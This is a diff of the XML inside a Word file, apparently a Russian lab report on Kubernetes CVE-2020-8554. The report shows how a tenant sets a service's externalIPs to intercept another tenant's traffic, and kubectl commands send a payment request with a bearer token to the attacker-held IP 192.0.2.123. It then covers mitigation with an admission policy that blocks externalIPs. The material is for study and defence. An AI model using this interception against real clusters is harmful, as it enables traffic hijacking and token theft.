+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>100,\</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>"currency\</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>":\</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
         <w:t>"</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>USD\"}</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>" \</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    http://192.0.2.123:5000/v1/payments'</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Где указан тот же самый </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ip</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">как и в поле </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>externalIPs</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>":[</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>"192.0.2.123</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>"]}}</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>' \</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">  --as=</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>system:serviceaccount</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>:tenant-</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>b:attacker</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">В данном обновлении был выставлен </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>ip</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
-        <w:t>–</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> 192.0.2.123, </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">следовательно контейнер перехватчика будет развернут на этом </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>ip</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>. Следовательно, если жертва отправит данный</w:t>
+        <w:t xml:space="preserve">у атакующего, а также для авторизации был указан </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>API</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>POST</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> запрос:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>kubectl</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -n tenant-</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>a</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> exec victim -- \</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>sh</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -c 'curl -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>sS</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -X POST \</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">  -H "Authorization: Bearer $API_TOKEN" \</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    -H "Content-Type: application/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>json</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>" \</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    -</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>d "{</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>\"amount\":</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>100,\</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>"currency\</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>":\</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>"</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>USD\"}</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>" \</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    http://192.0.2.123:5000/v1/payments'</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">Где указан тот же самый </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>ip</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">как и в поле </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>externalIPs</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">у атакующего, а также для авторизации был указан </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>API</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
         <w:t>токен, который будет скомпрометирован атакующей стороной.</w:t>
       </w:r>
     </w:p>
@@ -6817,11 +6819,6 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>Следовательно перехватчик получил запрос и корректно вернул ответ с кодом 200.</w:t>
@@ -6907,14 +6904,14 @@
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="40" w:name="_Toc231774186"/>
+      <w:bookmarkStart w:id="53" w:name="_Toc231834654"/>
       <w:r>
         <w:t>CVE-2020-8554</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> устранение уязвимости</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="40"/>
+      <w:bookmarkEnd w:id="53"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -6927,7 +6924,7 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="41" w:name="_Toc231774187"/>
+      <w:bookmarkStart w:id="54" w:name="_Toc231834655"/>
       <w:r>
         <w:t xml:space="preserve">запрет на создание </w:t>
       </w:r>
@@ -6952,39 +6949,30 @@
         </w:rPr>
         <w:t>datingadmissionpolicy</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="41"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
+      <w:bookmarkEnd w:id="54"/>
+    </w:p>
+    <w:p>
       <w:r>
         <w:t xml:space="preserve">Для устранения необходимо добавить политику, запрещающую создание </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>externalIPs</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve">. </w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">Для наглядности, ее создание будет в поле администратора. Также, если опасные </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>externalIPs</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -7010,37 +6998,12 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>kubectl</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -n tenant-b patch service hijack-external-</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>api</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> \</w:t>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>kubectl -n tenant-b patch service hijack-external-api \</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -7088,17 +7051,8 @@
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>"</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>externalIPs</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>"externalIPs</w:t>
+      </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
@@ -7123,7 +7077,6 @@
         <w:br/>
         <w:t>--as=</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
@@ -7156,7 +7109,6 @@
         </w:rPr>
         <w:t>-admin</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -7187,14 +7139,12 @@
       <w:r>
         <w:t xml:space="preserve">Сама политика описывается в </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>yaml</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t>-</w:t>
       </w:r>
@@ -7255,14 +7205,12 @@
       <w:r>
         <w:t xml:space="preserve">Создание политики запрета </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>externalIPs</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t>.</w:t>
       </w:r>
@@ -7278,14 +7226,12 @@
       <w:r>
         <w:t xml:space="preserve">После ее применения, попытка создать </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>externalIP</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -7343,14 +7289,12 @@
       <w:r>
         <w:t xml:space="preserve">Блокировка создания </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>externalIP</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t>.</w:t>
       </w:r>
@@ -7394,13 +7338,13 @@
           <w:bCs/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="42" w:name="_Toc518292931"/>
-      <w:bookmarkStart w:id="43" w:name="_Toc231774188"/>
+      <w:bookmarkStart w:id="55" w:name="_Toc518292931"/>
+      <w:bookmarkStart w:id="56" w:name="_Toc231834656"/>
       <w:r>
         <w:t>ЗАКЛЮЧЕНИЕ</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="42"/>
-      <w:bookmarkEnd w:id="43"/>
+      <w:bookmarkEnd w:id="55"/>
+      <w:bookmarkEnd w:id="56"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -7469,14 +7413,12 @@
       <w:r>
         <w:t xml:space="preserve">с использованием </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>minikube</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -7495,14 +7437,12 @@
       <w:r>
         <w:t xml:space="preserve">контейнера. Был реализован сценарий эксплуатации уязвимости, который на создании контейнера с произвольным содержимым на </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>ip</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve"> адресе, который может быть использован для маршрутизации внутреннего трафика кластера, тем самым приведя к перехвату этого трафика.</w:t>
       </w:r>
@@ -7545,25 +7485,21 @@
       <w:r>
         <w:t>.</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>externalIPs</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve"> может содержать </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>ip</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -7603,14 +7539,12 @@
       <w:r>
         <w:t>.</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>externalIPs</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -7629,14 +7563,12 @@
       <w:r>
         <w:t xml:space="preserve">внутри данного кластера. Повторная попытка добавления внешнего </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>ip</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -7652,14 +7584,12 @@
       <w:r>
         <w:t>.</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>externalIPs</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve"> была пресечена ранее созданной политикой. Таким образом, уязвимость </w:t>
       </w:r>
@@ -7692,6 +7622,7 @@
         </w:numPr>
         <w:ind w:left="1140"/>
       </w:pPr>
+      <w:bookmarkStart w:id="57" w:name="_Toc231834657"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">список </w:t>
@@ -7702,6 +7633,7 @@
       <w:r>
         <w:t>источников</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="57"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -7727,21 +7659,7 @@
             <w:rStyle w:val="Hyperlink"/>
             <w:lang w:val="en-US"/>
           </w:rPr>
-          <w:t>https://kube</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-            <w:lang w:val="en-US"/>
-          </w:rPr>
-          <w:t>r</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-            <w:lang w:val="en-US"/>
-          </w:rPr>
-          <w:t>netes.io/docs/home/</w:t>
+          <w:t>https://kubernetes.io/docs/home/</w:t>
         </w:r>
       </w:hyperlink>
     </w:p>
@@ -7757,19 +7675,11 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>Minikube</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> documentation – URL: </w:t>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Minikube documentation – URL: </w:t>
       </w:r>
       <w:hyperlink r:id="rId21" w:history="1">
         <w:r>
@@ -7833,30 +7743,8 @@
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve">Man in the middle using </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>LoadBalancer</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> or </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>ExternalIPs</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>Man in the middle using LoadBalancer or ExternalIPs</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -7887,33 +7775,17 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>Datalog</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">: </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>Unpatchable</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Vulnerabilities of Kubernetes: CVE-2020-8554</w:t>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Datalog: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Unpatchable Vulnerabilities of Kubernetes: CVE-2020-8554</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -7998,7 +7870,7 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="44" w:name="_Toc518292932"/>
